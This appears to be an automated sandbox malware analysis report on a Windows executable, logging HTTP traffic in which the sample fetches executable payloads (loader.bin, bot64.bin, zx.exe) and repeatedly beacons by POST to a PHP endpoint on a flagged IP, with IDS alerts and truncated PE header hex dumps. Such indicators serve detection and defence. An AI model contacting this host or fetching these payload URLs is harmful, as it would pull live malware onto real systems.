Windows Analysis Report fNzx1wx8tL.exe

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 18:22:37 GMTETag: "3d600-624c4633f8951"Accept-Ranges: bytesContent-Length: 251392Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8c d6 90 63 c8 b7 fe 30 c8 b7 fe 30 c8 b7 fe 30 0c 72 30 30 9e b7 fe 30 0c 72 33 30 c1 b7 fe 30 c8 b7 ff 30 5a b7 fe 30 34 c0 47 30 c7 b7 fe 30 0c 72 31 30 ee b7 fe 30 34 c0 42 30 c9 b7 fe 30 ef 71 2d 30 c1 b7 fe 30 ef 71 34 30 c9 b7 fe 30 ef 71 32 30 c9 b7 fe 30 52 69 63 68 c8 b7 fe 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 6d a7 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 e4 00 00 00 16 03 00 00 00 00 00 e0 45 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 68 01 00 57 00 00 00 f4 59 01 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 b0 0d 00 00 00 00 00 00 00 00 00 00 00 10 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 42 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 87 68 00 00 00 00 01 00 00 6a 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 8e 02 00 00 70 01 00 00 68 02 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b0 0d 00 00 00 00 04 00 00 0e 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 0d 00 00 00 10 04 00 00 0e 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 24 Oct 2024 23:02:05 GMTETag: "47200-62540fdb871e7"Accept-Ranges: bytesContent-Length: 291328Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 cb e0 d8 65 aa 8e 8b 65 aa 8e 8b 65 aa 8e 8b 65 aa 8f 8b e5 aa 8e 8b 99 dd 37 8b 62 aa 8e 8b a1 6f 43 8b 6f aa 8e 8b a1 6f 41 8b 5a aa 8e 8b a1 6f 40 8b d4 aa 8e 8b 42 6c 40 8b 60 aa 8e 8b 42 6c 41 8b 70 aa 8e 8b 42 6c 44 8b 64 aa 8e 8b 42 6c 47 8b 64 aa 8e 8b 42 6c 42 8b 64 aa 8e 8b 52 69 63 68 65 aa 8e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 ed d1 1a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 0a 03 00 00 0a 02 00 00 00 00 00 f0 e8 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 fd 03 00 56 00 00 00 d4 f1 03 00 50 00 00 00 00 10 05 00 88 02 00 00 00 d0 04 00 28 32 00 00 00 00 00 00 00 00 00 00 00 20 05 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 a4 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 de 00 00 00 20 03 00 00 e0 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 cc 00 00 00 00 04 00 00 28 00 00 00 ee 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 32 00 00 00 d0 04 00 00 34 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 88 02 00 00 00 10 05 00 00 04 00 00 00 4a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3e 22 00 00 00 20 05 00 00 24 00 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 27 Oct 2024 18:59:13 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 26 Oct 2024 18:22:41 GMTETag: "5a4531-625655231d3e4"Accept-Ranges: bytesContent-Length: 5915953Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 71 33 1d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 56 1a 5b 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 176.111.174.140 176.111.174.140

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WILWAWPL WILWAWPL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49737 -> 176.111.174.140:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 176.111.174.140:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 176.111.174.140:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 40
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
